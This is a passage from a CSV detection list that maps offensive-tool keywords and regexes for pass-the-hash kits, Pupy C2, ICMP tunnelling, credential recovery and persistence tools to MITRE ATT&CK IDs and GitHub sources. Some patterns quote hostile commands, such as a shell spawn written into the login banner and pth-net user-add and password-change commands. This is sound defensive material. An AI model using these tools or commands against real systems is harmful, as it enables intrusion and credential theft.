TA0008","N/A","Volt Typhoon","Credential Access","https://gitlab.com/kalilinux/packages/windows-binaries/-/tree/kali/master/fgdump","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*PstPassword.exe*",".{0,1000}PstPassword\.exe.{0,1000}","offensive_tool_keyword","PstPassword","recover the PST passwords of Outlook","T1212","TA0006","N/A","N/A","Credential 
Access","https://www.nirsoft.net/utils/pst_password.html","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*pstpassword.zip*",".{0,1000}pstpassword\.zip.{0,1000}","offensive_tool_keyword","PstPassword","recover the PST passwords of Outlook","T1212","TA0006","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/pst_password.html","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*pstpassword_setup.exe*",".{0,1000}pstpassword_setup\.exe.{0,1000}","offensive_tool_keyword","PstPassword","recover the PST passwords of Outlook","T1212","TA0006","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/pst_password.html","1","1","N/A","9","10","N/A","N/A","N/A","N/A" "*pstree.ps1*",".{0,1000}pstree\.ps1.{0,1000}","offensive_tool_keyword","nimbo-c2","Nimbo-C2 is yet another (simple and lightweight) C2 framework","T1059 - T1078 - T1102 - T1105 - T1132 - T1136 - T1140 - T1204 - T1219 - T1543 - T1547 - T1553 - T1573 - T1574 - T1608","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/itaymigdal/Nimbo-C2","1","1","N/A","10","10","296","38","2024-04-30T22:07:23Z","2022-10-08T19:02:58Z" "*PtC.exe challenge*",".{0,1000}PtC\.exe\schallenge.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","0","N/A","9","4","318","23","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" "*PtC.exe compare*",".{0,1000}PtC\.exe\scompare.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","0","N/A","9","4","318","23","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" "*PtC.exe inject*",".{0,1000}PtC\.exe\sinject.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - 
T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","0","N/A","9","4","318","23","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" "*PtC.exe nthash *",".{0,1000}PtC\.exe\snthash\s.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","0","N/A","9","4","318","23","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" "*PtC.exe ping*",".{0,1000}PtC\.exe\sping.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","0","N/A","9","4","318","23","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" "*PtC.exe protect*",".{0,1000}PtC\.exe\sprotect.{0,1000}","offensive_tool_keyword","PassTheChallenge","Recovering NTLM hashes from Credential Guard","T1003 - T1555.002","TA0006 - TA0005","N/A","N/A","Exploitation tools","https://github.com/ly4k/PassTheChallenge","1","0","N/A","9","4","318","23","2022-12-26T01:09:18Z","2022-12-26T00:56:40Z" "*pth-net rpc group members *Domain admins*",".{0,1000}pth\-net\srpc\sgroup\smembers\s.{0,1000}Domain\sadmins.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*pth-net rpc group members *Exchange Servers*",".{0,1000}pth\-net\srpc\sgroup\smembers\s.{0,1000}Exchange\sServers.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - 
T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*pth-net rpc password * -U * -S *",".{0,1000}pth\-net\srpc\spassword\s.{0,1000}\s\-U\s.{0,1000}\s\-S\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*pth-net rpc user add * -U *-S *",".{0,1000}pth\-net\srpc\suser\sadd\s.{0,1000}\s\-U\s.{0,1000}\-S\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*pth-rpcclient*",".{0,1000}pth\-rpcclient.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550 - T1075 - T1110 - T1021","TA0002 - TA0003 - TA0005","N/A","N/A","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","6","532","134","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z" "*pth-smbclient*",".{0,1000}pth\-smbclient.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work 
straight out of the box even on the most 'bare bones' systems","T1550 - T1075 - T1110 - T1021","TA0002 - TA0003 - TA0005","N/A","N/A","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","6","532","134","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z" "*PTHSMBClientDelete*",".{0,1000}PTHSMBClientDelete.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*PTHSMBClientGet*",".{0,1000}PTHSMBClientGet.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*PTHSMBClientList*",".{0,1000}PTHSMBClientList.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*PTHSMBClientPut*",".{0,1000}PTHSMBClientPut.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*PTHSMBExec*",".{0,1000}PTHSMBExec.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*pth-smbget*",".{0,1000}pth\-smbget.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550 - T1075 - T1110 - T1021","TA0002 - TA0003 - TA0005","N/A","N/A","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","6","532","134","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z" "*pth-toolkit*",".{0,1000}pth\-toolkit.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550 - T1075 - T1110 - T1021","TA0002 - TA0003 - TA0005","N/A","N/A","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","6","532","134","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z" "*pth-winexe*",".{0,1000}pth\-winexe.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550 - T1075 - T1110 - T1021","TA0002 - TA0003 - TA0005","N/A","N/A","Lateral 
Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","6","532","134","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z" "*pth-wmic*",".{0,1000}pth\-wmic.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550 - T1075 - T1110 - T1021","TA0002 - TA0003 - TA0005","N/A","N/A","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","6","532","134","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z" "*PTHWMIExec*",".{0,1000}PTHWMIExec.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","0","N/A","10","10","285","59","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" "*pth-wmis*",".{0,1000}pth\-wmis.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550 - T1075 - T1110 - T1021","TA0002 - TA0003 - TA0005","N/A","N/A","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","1","N/A","N/A","6","532","134","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z" "*ptresearch/AttackDetection*",".{0,1000}ptresearch\/AttackDetection.{0,1000}","offensive_tool_keyword","POC","POC exploits - The Attack Detection Team searches for new vulnerabilities and 0-days. reproduces it and creates PoC exploits to understand how these security flaws work and how related attacks can be detected on the network layer. Additionally. we are interested in malware and hackers TTPs. 
so we develop Suricata rules for detecting all sorts of such activities.","T1210 - T1583 - T1586 - T1589 - T1596","TA0002 - TA0011 - TA0007","N/A","N/A","Exploitation tools","https://github.com/ptresearch/AttackDetection","1","1","N/A","N/A","10","1314","358","2022-08-31T09:26:21Z","2016-03-24T14:42:50Z" "*ptunnel-client.log*",".{0,1000}ptunnel\-client\.log.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","4","354","66","2024-04-07T14:33:25Z","2017-12-19T18:10:35Z" "*ptunnel-data-recv*",".{0,1000}ptunnel\-data\-recv.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","0","N/A","N/A","4","354","66","2024-04-07T14:33:25Z","2017-12-19T18:10:35Z" "*ptunnel-data-send*",".{0,1000}ptunnel\-data\-send.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","0","N/A","N/A","4","354","66","2024-04-07T14:33:25Z","2017-12-19T18:10:35Z" "*ptunnel-master*",".{0,1000}ptunnel\-master.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","4","354","66","2024-04-07T14:33:25Z","2017-12-19T18:10:35Z" "*ptunnel-ng *",".{0,1000}ptunnel\-ng\s.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","0","N/A","N/A","4","354","66","2024-04-07T14:33:25Z","2017-12-19T18:10:35Z" 
"*ptunnel-ng.conf*",".{0,1000}ptunnel\-ng\.conf.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","4","354","66","2024-04-07T14:33:25Z","2017-12-19T18:10:35Z" "*ptunnel-ng.git*",".{0,1000}ptunnel\-ng\.git.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","4","354","66","2024-04-07T14:33:25Z","2017-12-19T18:10:35Z" "*ptunnel-ng.service*",".{0,1000}ptunnel\-ng\.service.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","4","354","66","2024-04-07T14:33:25Z","2017-12-19T18:10:35Z" "*ptunnel-ng.te*",".{0,1000}ptunnel\-ng\.te.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","4","354","66","2024-04-07T14:33:25Z","2017-12-19T18:10:35Z" "*ptunnel-ng-x64.exe*",".{0,1000}ptunnel\-ng\-x64\.exe.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","4","354","66","2024-04-07T14:33:25Z","2017-12-19T18:10:35Z" "*ptunnel-ng-x64-dbg.exe*",".{0,1000}ptunnel\-ng\-x64\-dbg\.exe.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data 
Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","4","354","66","2024-04-07T14:33:25Z","2017-12-19T18:10:35Z" "*ptunnel-ng-x86.exe*",".{0,1000}ptunnel\-ng\-x86\.exe.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","4","354","66","2024-04-07T14:33:25Z","2017-12-19T18:10:35Z" "*ptunnel-ng-x86-dbg.exe*",".{0,1000}ptunnel\-ng\-x86\-dbg\.exe.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","4","354","66","2024-04-07T14:33:25Z","2017-12-19T18:10:35Z" "*ptunnel-server.log*",".{0,1000}ptunnel\-server\.log.{0,1000}","offensive_tool_keyword","ptunnel-ng","Tunnel TCP connections through ICMP.","T1095.001 - T1572.001","TA0011 - TA0040 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/utoni/ptunnel-ng","1","1","N/A","N/A","4","354","66","2024-04-07T14:33:25Z","2017-12-19T18:10:35Z" "*pty.spawn(""/bin/sh""* >> /etc/update-motd.d/00-header*",".{0,1000}pty\.spawn\(\""\/bin\/sh\"".{0,1000}\s\>\>\s\/etc\/update\-motd\.d\/00\-header.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*public class 
Keylogger*",".{0,1000}public\sclass\sKeylogger.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","0","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*public class NTLMInjector*",".{0,1000}public\sclass\sNTLMInjector.{0,1000}","offensive_tool_keyword","NTLMInjector","restore the user password after a password reset (get the previous hash with DCSync)","T1555 - T1556.003 - T1078 - T1110.003 - T1201 - T1003","TA0001 - TA0003 - TA0004 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/vletoux/NTLMInjector","1","0","N/A","10","2","164","29","2017-06-08T19:01:21Z","2017-06-04T07:25:36Z" "*Public\dcinst.exe*",".{0,1000}Public\\dcinst\.exe.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","0","N/A","10","5","417","103","2024-02-23T14:13:01Z","2019-04-20T14:51:18Z" "*PublicKeyToken=8337224c9ad9e356*",".{0,1000}PublicKeyToken\=8337224c9ad9e356.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. 
An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","883","130","2023-11-10T09:31:25Z","2018-11-28T21:07:51Z" "*pupy*/checkvm.py*",".{0,1000}pupy.{0,1000}\/checkvm\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*pupy/payload_*",".{0,1000}pupy\/payload_.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*PupyCmdLoop*",".{0,1000}PupyCmdLoop.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. 
cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*PupyCredentials.py*",".{0,1000}PupyCredentials\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*PupyDnsCnc.py*",".{0,1000}PupyDnsCnc\.py.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*PupyDnsCommandServerHandler*",".{0,1000}PupyDnsCommandServerHandler.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*pupygen.py *",".{0,1000}pupygen\.py\s.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*PupyKCPSocketStream*",".{0,1000}PupyKCPSocketStream.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*PupyLoaderTemplate.*",".{0,1000}PupyLoaderTemplate\..{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*PupyOffloadDNS*",".{0,1000}PupyOffloadDNS.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*PupyOffloadSocket*",".{0,1000}PupyOffloadSocket.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
